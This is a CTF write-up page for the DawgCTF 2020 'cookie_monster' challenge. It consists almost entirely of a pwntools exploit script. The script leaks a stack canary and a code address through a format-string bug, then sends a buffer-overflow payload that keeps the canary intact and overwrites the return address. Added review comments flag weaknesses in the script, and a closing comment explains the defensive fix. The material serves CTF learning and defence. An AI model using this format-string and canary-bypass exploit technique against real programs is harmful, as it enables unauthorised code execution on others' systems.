Tags: stackcanary format-string pwn pwntools binaryexploitation ret2libc 


[Detailed write-up on GitHub](https://github.com/shellc0d3/CTFwriteups/tree/master/dawgctf2020/cookie_monster)
```
#!/usr/bin/env python2
from pwn import *
import sys

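# Target selection: with no command-line arguments the script connects to the
# CTF service; with any argument it starts the local challenge binary.
# (The pasted listing had lost the indentation of both branches, which made
# the if/else a syntax error; it is restored here.)
if len(sys.argv) == 1:
    conn = remote('ctf.umbccd.io', 4200)
else:
    conn = process('./cookie_monster')

# Stage 1 - read the stack cookie.
# The answer to the '?' prompt is a printf-style positional specifier. The
# script relies on the target printing it back *expanded* after 'Hello, ',
# i.e. on the program treating the supplied name as a format string.
conn.sendlineafter('?', '%9$lx')
conn.recvuntil('Hello, ')
# Eight hex digits are parsed and repacked as a 4-byte value in pwntools'
# configured byte order.
# NOTE(review): recv(8) returns *up to* 8 bytes; a short read would be parsed
# as a truncated value.
canary = p32(int(conn.recv(8), 16))
conn.close()

# Stage 2 - read an address, then send the overflow input.
# NOTE(review): this always starts the local binary, even when stage 1 used
# the remote service, so in that mode the two stages talk to different
# targets.
# NOTE(review): the cookie from stage 1 belongs to a connection that is
# already closed. Reusing it here only works if the cookie has the same value
# in a freshly started process - presumably the challenge's cookie is
# predictable; confirm against the linked write-up. With a cookie that is
# random per process this stage would end in the program's cookie-check
# failure rather than in a redirected return.
conn = process('./cookie_monster')
conn.sendlineafter('?', '%11$lx')
conn.recvuntil('Hello, ')
# Twelve hex digits are parsed, 0x19a is subtracted and the result is packed
# as an 8-byte value. The offset is a constant of this particular binary
# build; nothing on this page derives it.
ret = p64(int(conn.recv(12), 16) - 0x19a)

# Input layout: 13 filler bytes, the cookie, 8 filler bytes, the computed
# address (presumably buffer padding, cookie slot, saved frame pointer and
# return address - TODO confirm against the binary).
payload = 'a'*13 + canary + 'a'*8 + ret
conn.sendlineafter('?', payload)
# Parenthesised single-argument print behaves the same under Python 2.
print(conn.recvall())
conn.close()

# Defensive takeaway: both leaked values come from the same root cause, user
# input reaching a printf-family call as the format argument. Printing the
# name through a fixed format (for example printf("%s", name)) removes the
# leak, and GCC's -Wformat-security warning flags the pattern at build time.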
```